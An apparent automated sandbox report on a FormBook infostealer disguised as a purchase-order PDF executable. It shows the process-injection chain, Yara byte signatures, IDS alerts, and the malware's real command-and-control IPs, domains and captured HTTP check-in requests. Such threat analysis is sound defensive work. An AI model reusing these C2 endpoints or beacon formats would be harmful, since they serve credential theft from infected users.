Windows Analysis Report
Purchase_Order_pdf.exe

Overview

General Information

Sample name: Purchase_Order_pdf.exe
Analysis ID: 1545090
MD5: 0e51b97a594aa2f1756261a47a695484
SHA1: 0c2d719650e6a5bab5a3616c357eb20f6bb6cb6d
SHA256: 03489fbf1f559b8f7e7c6a0dec74826233e3c79ca34bdf06f9617f269b68ff54

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • Purchase_Order_pdf.exe (PID: 4148 cmdline: "C:\Users\user\Desktop\Purchase_Order_pdf.exe" MD5: 0E51B97A594AA2F1756261A47A695484)
    • svchost.exe (PID: 1288 cmdline: "C:\Users\user\Desktop\Purchase_Order_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hEtOKWgxZfeL.exe (PID: 3160 cmdline: "C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 2924 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • hEtOKWgxZfeL.exe (PID: 1492 cmdline: "C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4676 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

        System Summary

        Source: Process started, Author: juju4, Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe" , ParentImage: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe, ParentProcessId: 3160, ParentProcessName: hEtOKWgxZfeL.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 2924, ProcessName: rasdial.exe
        Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", CommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase_Order_pdf.exe, ParentProcessId: 4148, ParentProcessName: Purchase_Order_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", ProcessId: 1288, ProcessName: svchost.exe
        Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", CommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase_Order_pdf.exe, ParentProcessId: 4148, ParentProcessName: Purchase_Order_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase_Order_pdf.exe", ProcessId: 1288, ProcessName: svchost.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-30T04:56:49.169655+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49990 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-30T04:56:10.140779+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49900 | 54.67.87.110 | 80 | TCP
        2024-10-30T04:56:33.945080+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49984 | 195.161.68.8 | 80 | TCP
        2024-10-30T04:56:48.804469+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49990 | 18.141.10.107 | 80 | TCP
        2024-10-30T04:57:04.070060+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49994 | 197.189.237.186 | 80 | TCP
        2024-10-30T04:57:38.392162+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49998 | 162.0.238.246 | 80 | TCP
        2024-10-30T04:57:52.116985+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50002 | 31.31.196.17 | 80 | TCP
        2024-10-30T04:58:13.602539+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50006 | 188.114.97.3 | 80 | TCP
        2024-10-30T04:58:34.799142+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50010 | 206.119.82.147 | 80 | TCP
        2024-10-30T04:58:48.193549+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50014 | 162.0.209.213 | 80 | TCP
        2024-10-30T04:59:01.765592+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50018 | 3.33.130.190 | 80 | TCP
        2024-10-30T04:59:15.119690+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50022 | 144.34.186.85 | 80 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-30T04:56:26.288725+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49981 | 195.161.68.8 | 80 | TCP
        2024-10-30T04:56:28.819959+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49982 | 195.161.68.8 | 80 | TCP
        2024-10-30T04:56:31.398107+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49983 | 195.161.68.8 | 80 | TCP
        2024-10-30T04:56:40.835616+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49987 | 18.141.10.107 | 80 | TCP
        2024-10-30T04:56:43.523161+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49988 | 18.141.10.107 | 80 | TCP
        2024-10-30T04:56:46.132508+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49989 | 18.141.10.107 | 80 | TCP
        2024-10-30T04:56:56.070267+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49991 | 197.189.237.186 | 80 | TCP
        2024-10-30T04:56:58.617053+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49992 | 197.189.237.186 | 80 | TCP
        2024-10-30T04:57:01.163830+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49993 | 197.189.237.186 | 80 | TCP
        2024-10-30T04:57:30.742881+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49995 | 162.0.238.246 | 80 | TCP
        2024-10-30T04:57:33.302020+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49996 | 162.0.238.246 | 80 | TCP
        2024-10-30T04:57:35.848987+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49997 | 162.0.238.246 | 80 | TCP
        2024-10-30T04:57:44.553479+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49999 | 31.31.196.17 | 80 | TCP
        2024-10-30T04:57:47.023221+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50000 | 31.31.196.17 | 80 | TCP
        2024-10-30T04:57:49.538844+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50001 | 31.31.196.17 | 80 | TCP
        2024-10-30T04:58:05.947427+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50003 | 188.114.97.3 | 80 | TCP
        2024-10-30T04:58:08.500508+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50004 | 188.114.97.3 | 80 | TCP
        2024-10-30T04:58:11.041197+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50005 | 188.114.97.3 | 80 | TCP
        2024-10-30T04:58:20.179645+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50007 | 206.119.82.147 | 80 | TCP
        2024-10-30T04:58:22.726433+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50008 | 206.119.82.147 | 80 | TCP
        2024-10-30T04:58:25.276554+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50009 | 206.119.82.147 | 80 | TCP
        2024-10-30T04:58:40.554521+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50011 | 162.0.209.213 | 80 | TCP
        2024-10-30T04:58:43.097311+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50012 | 162.0.209.213 | 80 | TCP
        2024-10-30T04:58:45.631525+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50013 | 162.0.209.213 | 80 | TCP
        2024-10-30T04:58:54.945252+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50015 | 3.33.130.190 | 80 | TCP
        2024-10-30T04:58:56.637693+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50016 | 3.33.130.190 | 80 | TCP
        2024-10-30T04:58:59.148940+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50017 | 3.33.130.190 | 80 | TCP
        2024-10-30T04:59:07.485163+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50019 | 144.34.186.85 | 80 | TCP
        2024-10-30T04:59:10.038967+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50020 | 144.34.186.85 | 80 | TCP
        2024-10-30T04:59:12.589574+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50021 | 144.34.186.85 | 80 | TCP
        2024-10-30T04:59:21.101320+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50023 | 136.143.186.12 | 80 | TCP
        2024-10-30T04:59:23.999596+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50024 | 136.143.186.12 | 80 | TCP


        AV Detection

        Source: www.fieldelse.net, Virustotal: Detection: 6%
        Source: Purchase_Order_pdf.exe, ReversingLabs: Detection: 41%
        Source: Yara match, File source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
        Source: Purchase_Order_pdf.exe, Joe Sandbox ML: detected
        Source: Purchase_Order_pdf.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hEtOKWgxZfeL.exe, 00000004.00000002.4484569448.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4484878886.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: Purchase_Order_pdf.exe, 00000000.00000003.2047254065.0000000004760000.00000004.00001000.00020000.00000000.sdmp, Purchase_Order_pdf.exe, 00000000.00000003.2048049881.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335290079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333557983.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004BBE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2431777913.000000000486C000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2429249602.00000000046B2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004A20000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2429147053.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398042132.000000000321A000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485192473.0000000001388000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000003.2368169861.000000000139B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Purchase_Order_pdf.exe, 00000000.00000003.2047254065.0000000004760000.00000004.00001000.00020000.00000000.sdmp, Purchase_Order_pdf.exe, 00000000.00000003.2048049881.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335290079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333557983.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004BBE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2431777913.000000000486C000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2429249602.00000000046B2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004A20000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2429147053.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398042132.000000000321A000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485192473.0000000001388000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000003.2368169861.000000000139B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4486451389.000000000504C000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000002ABC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2719786041.00000000121FC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4486451389.000000000504C000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000002ABC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2719786041.00000000121FC000.00000004.80000000.00040000.00000000.sdmp

        Networking

        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 197.189.237.186:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49900 -> 54.67.87.110:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 31.31.196.17:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 162.0.209.213:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 162.0.209.213:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 162.0.209.213:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 188.114.97.3:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 197.189.237.186:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 197.189.237.186:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 162.0.238.246:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 195.161.68.8:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 162.0.238.246:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 18.141.10.107:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 31.31.196.17:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 31.31.196.17:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 31.31.196.17:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 206.119.82.147:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 144.34.186.85:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 144.34.186.85:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 195.161.68.8:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 18.141.10.107:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 136.143.186.12:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 162.0.238.246:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 206.119.82.147:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 195.161.68.8:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 18.141.10.107:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 206.119.82.147:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 162.0.209.213:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 195.161.68.8:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 188.114.97.3:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 18.141.10.107:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 136.143.186.12:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 188.114.97.3:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 197.189.237.186:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 206.119.82.147:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 188.114.97.3:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 144.34.186.85:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 162.0.238.246:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 144.34.186.85:80
        Source: DNS query: www.ngmr.xyz
        Source: DNS query: www.animekuid.xyz
        Source: DNS query: www.huyven.xyz
        Source: Joe Sandbox View, IP Address: 162.0.238.246
        Source: Joe Sandbox View, IP Address: 136.143.186.12
        Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
        Source: Joe Sandbox View, ASN Name: ZOHO-ASUS
        Source: Joe Sandbox View, ASN Name: xneeloZA
        Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
        Source: Network traffic, Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49990
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic, HTTP traffic detected:
          GET /fu87/?vxPD=qh6vHM1wnebxXDDw2+FKNmF+EgGb6h3lhyJTJqyJk9tXxJTOz685U0RnFTuJgXE78BkDdexAIHcYDkJjTquRDOTOtPaRUKFiNfEDt1vQqQEhgT+IhmyUGPK3HCAi1oMdiQ==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.ngmr.xyz
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /czka/?vxPD=ec+/5ooiqEi687og6mxZgK97hGtyT8hL+UNAVpoR3RpVRqn8W9A98dmq3fmGshL635UHDIR5u/r4iIgXkla3rsnbIqFgNahEcjh4DtJ4lSLz0jzSBM29wabUMiG34aKFBg==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.drivedoge.website
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /exug/?7JH=bvSPlHnHQ4A&vxPD=TUpMmFq2kwIXLFstS9tSAK6sg3+MTXwTelyO0iz++Kl2PamQN8cgWwJpHGB2BYM6TBg0ujJhQFrOEWIIA95gJhU2w3nrLf6Fr1xVloq0NNPRZ4qmm6KGpgvxijzqAjWBDA== HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.fieldelse.net
          User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global traffic, HTTP traffic detected:
          GET /iv79/?vxPD=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&7JH=bvSPlHnHQ4A HTTP/1.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Language: en-US,en;q=0.9
          Connection: close
          Host: www.patioprojex.africa
